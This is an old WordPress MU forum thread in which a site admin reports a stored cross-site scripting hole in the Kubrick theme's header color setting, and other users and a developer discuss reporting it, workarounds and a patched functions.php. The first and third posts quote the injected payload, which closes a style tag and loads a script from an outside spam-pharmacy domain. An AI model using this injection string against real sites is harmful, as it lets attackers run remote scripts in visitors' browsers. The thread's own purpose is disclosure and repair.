The MU forums have moved to WordPress.org

Kubrick and splog (12 posts)

  1. redbox
    Member
    Posted 15 years ago #

    I clicked on a new blog on my site and was surprised to see the "requested account deleted" message as if it had been deleted or marked as spam. The background was black and the text was red. I checked the account and it was neither deleted or marked as spam. I viewed the page source and could see the regular page text which included a lot of keywords for prescriptions, though no links. I finally figured out that they were using Kubrick and entered a javascript link in the kubrick header selector

    header-img.php?upper=\"}--></style><script src=http://1.onlinesearch4meds.com/ap/levitra.js></script><style>&lower=4180b6

    I would imagine something like this could cause some damage. Is there a way to prevent it?

  2. drmike
    Member
    Posted 15 years ago #

    Best bet would be to probably submit an email to security ( at ) wordpress ( dot ) org as Kubrick is a theme that they keep an eye on.

    I'm lost though. Where exactly in Kubrick was it put in? Into header.php or something on the user side?

  3. redbox
    Member
    Posted 15 years ago #

    It was entered where you customize the Kubrick header color from the users admin panel. Go to Presentation... Customize Header... then click Advanced.

    They deleted the color hex code and entered \"}--></style><script src=http://1.onlinesearch4meds.com/ap/levitra.js></script><style> in that field to result in the code I posted above.

  4. drmike
    Member
    Posted 15 years ago #

    email security asap and mention it's showing up on the WPMu version of Kubrick. Sounds like the code is not going through the special characters and kses functions. It's got to be an oversight.

  5. redbox
    Member
    Posted 15 years ago #

    Thanks. I emailed and they sent me an updated file to try, but it didn't filter out the code. Hopefully someone will be able to correct it.

    Thanks :)

  6. lunabyte
    Member
    Posted 15 years ago #

    For now, it seems like the most simple fix would be to use another theme as the default, and turn off themes with the same header feature.

  7. drmike
    Member
    Posted 15 years ago #

  8. Farms2
    Member
    Posted 15 years ago #

    Copy the text from the url below, rename it functions.php and upload it to /public_html/wp-content/themes/default/

    It'll remove entirely the option, however it won't fix any existing breaches.... if someone can provide instructions on that that'd be great.

    Here's the file: http://incsub.org/functions.txt

  9. Farms2
    Member
    Posted 15 years ago #

    I don't believe any themes that I've worked with have the same feature... anyone got any examples.

    Update: Site Admin > Blogs > Edut Blog (will most likely be your bottom option) and delete the Kubrik header image code should sort out idividual blogs.

  10. suleiman
    Member
    Posted 15 years ago #

    i think k2 also does this.

  11. donncha
    Key Master
    Posted 15 years ago #

    I was able to reproduce this in the "Home" theme but after copying over files from the default theme the problem was fixed. See http://trac.mu.wordpress.org/changeset/977 for the fixed version of functions.php

  12. drmike
    Member
    Posted 15 years ago #

    Thanks Donncha.

    So when do we get to see some more pictures of Adam?

About this Topic